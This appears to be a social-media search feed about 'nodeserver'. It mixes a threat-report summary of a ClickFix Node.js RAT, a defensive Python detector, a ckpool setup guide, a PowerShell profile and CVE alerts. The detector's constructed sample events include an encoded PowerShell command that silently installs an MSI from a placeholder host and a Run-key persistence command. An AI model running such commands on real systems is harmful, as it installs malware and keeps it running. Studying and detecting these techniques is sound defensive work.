#threatreport #MediumCompleteness From ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel | 06-04-2026
Source: netskope.com/blog/from-click…
Key details below ↓
💀 Threats: Clickfix_technique, Legionloader, Lumma_stealer
🎯 Victims: Windows users, Cryptocurrency wallets
📚 TTPs: ⚔️ Tactics: 3 🛠️ Technics: 0
🤖 LLM extracted TTPs: T1005, T1027, T1027.010, T1041, T1057, T1059.001, T1059.003, T1059.007, T1071, T1082, ...
🧨 IOCs: Command: 1, Domain: 2, File: 26, Registry: 1, Path: 1, Hash: 1, Url: 3
💽 Software: Node.js, Windows Registry, Windows Defender, Telegram
🔢 Algorithms: xor, pbkdf2, ecdh, aes-256-cbc, base64, sha256
🔠 Functions: setTimeout, reshuffleConfig
📜 Programming Languages: javascript, powershell
💻 Platforms: x64, x86
#threatreport: Netskope Threat Labs has identified a new cyber threat campaign utilizing ClickFix, predominantly targeting Windows users. This campaign, which began delivering custom malware in early 2025, employs a modular NodeJS-based remote access Trojan (RAT) that is designed to execute malicious activities seamlessly while minimizing its detection footprint. This malware is delivered through malicious MSI installers that, when activated, covertly download and execute the payload without user intervention, avoiding traditional security measures. The malware uses an innovative approach, ensuring all primary stealing modules and communication protocols operate entirely in memory, which prevents forensic analysis from easily revealing its functionalities. When the user interacts with a fake CAPTCHA, a base64-encoded PowerShell command operates in the background to download and install the RAT using the NodeServer-Setup-Full.msi package. The MSI installer is notably self-sufficient, carrying a full Node.js runtime and dependencies in its package, negating the need for prior installations on the victim’s machine.
Permanent access is maintained as the malware edits the Windows Registry, ensuring it launches every time the system starts. It achieves command-and-control (C2) communication through gRPC over the Tor network, significantly obscuring its operational infrastructure. This sophisticated C2 architecture supports bidirectional communication which allows for real-time command execution and data retrieval. An operational security breach by the attackers disclosed an admin panel's protocol definitions, revealing their malware-as-a-service (MaaS) framework. This backend system is crafted to manage multiple operators and effectively track various cryptocurrency assets while allowing operators to execute commands, manage stored modules, and handle victim profiles. The framework's modularity not only facilitates versatility in data theft but also expands the malware’s capabilities beyond simple information gathering to arbitrary code execution. Moreover, the malware implements multi-layered encryption to safeguard its configuration data before establishing C2 connections, utilizing either AES-256-CBC or XOR encryption methods. It scans for over 30 security products to assess the system's defenses before executing payloads, allowing attackers to adjust tactics accordingly. The architecture of this malware represents a significant evolution in cyber threats, shifting toward modular, binary-less execution while targeting cryptocurrency wallets. By fully utilizing the Tor network for secure communications, the malware evades static defenses, marking a critical development in the landscape of cyber threats that analysts will need to closely monitor in the future.
1
67
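The report above describes three observable behaviours a defender can key on: a PowerShell launch with a base64-encoded command that quietly installs an MSI, a hidden console window, and a Run-key registry edit for persistence. The following is an added example, not code from Netskope or from the bot that posted the summary, showing how those behaviours can be flagged over process-creation events. Everything in it is an assumption for illustration: the event dictionary shape (`image`, `cmdline`), the sample events themselves (constructed, with a placeholder `example.invalid` URL and made-up paths), and the heuristic that treats `-e`, `-ec` and any three-plus-letter prefix of `-EncodedCommand` as the encoded-command switch.

```python
import base64
import re
import shlex

# Constructed sample process-creation events (not real telemetry from the report).
# Event 1 mirrors the pattern the report describes: a hidden PowerShell window
# running an -EncodedCommand that silently installs an MSI. The payload text is
# assembled here so the base64 is correct; the URL and paths are placeholders.
_SAMPLE_PAYLOAD = "msiexec /i https://example.invalid/NodeServer-Setup-Full.msi /quiet /norestart"
_SAMPLE_ENCODED = base64.b64encode(_SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -w hidden -enc {_SAMPLE_ENCODED}"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                r'/v NodeServer /t REG_SZ /d "C:\Users\victim\AppData\Roaming\node\node.exe loader.js"'},
]

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.IGNORECASE)


def is_encoded_flag(arg):
    """Heuristic (assumption): powershell.exe accepts short prefixes of -EncodedCommand."""
    flag = arg.lower().lstrip("-/")
    if flag in ("e", "ec"):
        return True
    return len(flag) >= 3 and "encodedcommand".startswith(flag)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or malformed."""
    try:
        args = shlex.split(cmdline, posix=False)
    except ValueError:
        args = cmdline.split()
    for i, arg in enumerate(args[:-1]):
        if is_encoded_flag(arg):
            try:
                return base64.b64decode(args[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def classify_event(event):
    """Tag one event with the behaviours worth alerting on; an empty list means nothing fired."""
    findings = []
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("powershell_encoded_command")
        lowered = decoded.lower()
        if "msiexec" in lowered or ".msi" in lowered:
            findings.append("encoded_msi_install")
        if re.search(r"https?://", lowered):
            findings.append("encoded_remote_fetch")
    if HIDDEN_WINDOW.search(cmd):
        findings.append("hidden_window")
    if event["image"].lower().endswith("reg.exe") and RUN_KEY.search(cmd):
        findings.append("run_key_persistence")
    return findings


def scan(events):
    """Map event index -> findings for every event that triggered at least one rule."""
    results = {}
    for index, event in enumerate(events):
        findings = classify_event(event)
        if findings:
            results[index] = findings
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["cmdline"][:60], findings)
```

Decoding the encoded command before matching is the important step: string rules on the raw command line never see `msiexec` or the download URL, which is the whole point of the encoding. The Run-key rule only looks at `reg.exe` here; the same registry path should also be matched in registry-set telemetry, since the report says the malware edits the key itself rather than shelling out.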
【From ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel】 According to Netskope Threat Labs, a new campaign has been observed that distributes a Node.js-based RAT/infostealer via ClickFix using a fake CAPTCHA. PowerShell quietly installs `NodeServer-Setup-Full.msi`, and after the C2 connection is made, additional modules are loaded dynamically into memory. Its distinctive feature is bidirectional C2 over gRPC on Tor. In addition, an attacker OPSEC mistake exposed a MaaS management backend that supports multiple operators, tracks cryptocurrency wallets, and has Telegram notification functionality. A case worth looking at for fake-CAPTCHA-initiated PowerShell, Run key persistence, and Tor/gRPC communication. #CyberSecurity #ClickFix #Malware #RAT #Windows #ThreatIntel netskope.com/blog/from-click…
2
364
4 Jun 2025
if i wanted to be fast i would find a rust developer and ask them to make wasm bindings which run inside of a node server that i call by python http requests to nodeserver to wasm to rust to 'ur super effing fast data encoding'.
1
70
Here, I wrote up some instructions on how I got ckpool working on my Ubuntu 22.04 VM (will probably work in 24.04 and debian, too)

1) Become root:
   sudo su -

2) Install required packages:
   apt install build-essential yasm autoconf automake libtool libzmq3-dev pkgconf wget nano unzip

3) Download source, compile, and install:
   wget bitbucket.org/ckolivas/ckpoo…
   unzip bb7b0aebe08e.zip
   cd ckolivas-ckpool-bb7b0aebe08e/
   ./autogen.sh
   ./configure
   make
   make install

4) Create a dedicated user for running ckpool (the group must exist before useradd -g can use it):
   groupadd ckpool
   useradd -s /bin/bash -c "ckpool mining pool" -d /home/ckpool -m -g ckpool ckpool
   passwd ckpool

5) Create configs and set permissions:
   mkdir /etc/ckpool /var/log/ckpool
   chown ckpool:ckpool /var/log/ckpool
   cp ckpool.conf /etc/ckpool/

6) Edit bitcoin.conf and set rpcuser and rpcpassword if not already set, and add blocknotify. You can make up any username and password you want.
   nano /home/satoshi/.bitcoin/bitcoin.conf
   rpcuser=smugllama
   rpcpassword=30sMSjdw93wjew922
   blocknotify=/usr/local/bin/notifier -n llamapool %s
   Restart bitcoin so it reads in the changes.

7) Add the user that bitcoin runs as to the ckpool group so it has permissions to write to the notifier socket.
   usermod -a -G ckpool satoshi

8) Edit your ckpool.conf and configure it:
   nano /etc/ckpool/ckpool.conf
   Set the "auth" to match the rpcuser from your bitcoin.conf.
   Set the "pass" to match the rpcpassword from your bitcoin.conf.
   Since I don't have a backup node, I deleted the whole section for the backup node.
   Set the "btcaddress" to your bitcoin address.
   Change your "btcsig" if you want to be famous.
   Change the "serverurl", "nodeserver", and "trusted" to only be your server's IP.
   Change "logdir" to /var/log/ckpool.

9) Test out ckpool and make sure it works:
   su - ckpool
   /usr/local/bin/ckpool --btcsolo --log-shares --name llamapool --group ckpool --config /etc/ckpool/ckpool.conf
   It should stay running. If not, fix any errors. If it works, press CTRL C to stop it and type exit to go back to root.

10) Add a service for it:
   nano /etc/systemd/system/ckpool.service

   [Unit]
   Description=ckpool daemon
   After=network.target

   [Service]
   Type=simple
   User=ckpool
   Group=ckpool
   WorkingDirectory=/home/ckpool
   ExecStart=/usr/local/bin/ckpool --btcsolo --log-shares --name llamapool --group ckpool --config /etc/ckpool/ckpool.conf

   [Install]
   WantedBy=multi-user.target

   (The unit is wanted by multi-user.target, so ordering it After=multi-user.target would create an ordering cycle; network.target is the usual choice.)

   Then run:
   systemctl daemon-reload
   systemctl start ckpool
   If it stays running and you don't see any errors, you can set it to run on OS boot-up:
   systemctl enable ckpool

11) Watch the log files:
   tail -f /var/log/ckpool/llamapool.log /home/satoshi/.bitcoin/debug.log

You should now be able to point your miners at your own pool on your server IP.
2
1
1
57
8 Mar 2025
Damn, the @grok is really just impressively awesome. He made me this cool PowerShell Profile, in just 5 Minutes. This is outstanding, extraordinary.

# Apply settings only in VS Code integrated terminal
if ($env:TERM_PROGRAM -eq "vscode") {
    # Function to run Flutter app in Chrome
    function Invoke-FlutterChrome {
        <#
        .SYNOPSIS
        Runs a Flutter app in Chrome.
        .DESCRIPTION
        Executes 'flutter run -d chrome' to launch a Flutter application in the Chrome browser. Only available in VS Code terminal.
        .EXAMPLE
        rc
        #>
        try {
            Write-Host "Launching the Flutter app in Chrome" -ForegroundColor Green
            & flutter run -d chrome
        } catch {
            Write-Error "Error occurred while running Flutter: $_"
        }
    }

    # Function to start Node.js server for CORS proxy
    function Start-NodeServer {
        <#
        .SYNOPSIS
        Starts a Node.js server for CORS proxy.
        .DESCRIPTION
        Executes 'node server.js' in the directory 'C:\Users\Fakepath\Desktop\VScodeProjects\nodejsServer\cors-proxy' to start a Node.js server. Only available in VS Code terminal.
        .EXAMPLE
        nsv
        #>
        try {
            Set-Location -Path "C:\Users\Fakepath\Desktop\VScodeProjects\nodejsServer\cors-proxy"
            Write-Host "Starting the Node.js server:" -ForegroundColor Green
            & node server.js
        } catch {
            Write-Error "Error occurred while starting the server: $_"
        }
    }

    # Register aliases for the functions
    Set-Alias -Name rc -Value Invoke-FlutterChrome
    # Set-Alias -Name r -Value Invoke-FlutterChrome
    Set-Alias -Name nodeserver -Value Start-NodeServer
    Set-Alias -Name nodesvr -Value Start-NodeServer
    Set-Alias -Name nsv -Value Start-NodeServer
}
1
123
The Server is built with 3 layers: a UDP Server, a Routing Server, and the NodeServer with its chunks. This ensures a smooth and scalable network structure for our MMORPG Teredor!
28
13/ 🌐 Web servers and fs module – a match made in heaven! Serve static files with ease! 🌍 #NodeServer #WebDev
1
4
12 Sep 2023
✅ New Episode on RackNerdTV! 💻 How to Know What Node Your RackNerd VPS is Hosted On | 📺▶ WATCH HERE: youtu.be/YXZhXkjSSdg 🛒 ORDER VPS HOSTING at racknerd.com/kvm-vps #Node #kvm #kvmvps #vpshosting #webhosting #dedicatedserver #dedicatedhost #nodeserver
149
New post from sesin.at (CVE-2020-36651 (nodeserver)) has been published on sesin.at/2023/01/25/cve-2020…

2
🚨 NEW: CVE-2020-36651 🚨 A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation l... (click for more) Severity: HIGH nvd.nist.gov/vuln/detail/CVE…

24
20 Jan 2023
Node.js is an open-source server environment and library that uses JavaScript on the server side. Get ready to know more about Node.js: blog.serverhub.com/all-about… #nodeserver #nodejs #programmingcode #programminglanguage #serverside #javascript
3
55
🚨 NEW: CVE-2020-36651 🚨 A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation l... (click for more) nvd.nist.gov/vuln/detail/CVE…

18
18 Jan 2023
CVE-2020-36651 A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation leads to path traversal. Th... cve.mitre.org/cgi-bin/cvenam…

2
799
🚨 NEW: CVE-2020-36651 🚨 A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation l... (click for more) nvd.nist.gov/vuln/detail/CVE…

17
18 Jan 2023
CVE-2020-36651 : A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation leads to path traversal. The na... cve.report/CVE-2020-36651

16
New post from sesin.at (CVE-2020-36651 | youngerheart nodeserver nodeserver.js path traversal) has been published on sesin.at/2023/01/17/cve-2020…

5
16 Jan 2023
CVE-2020-36651 | youngerheart nodeserver nodeserver.js path traversal dlvr.it/SgzTS6

5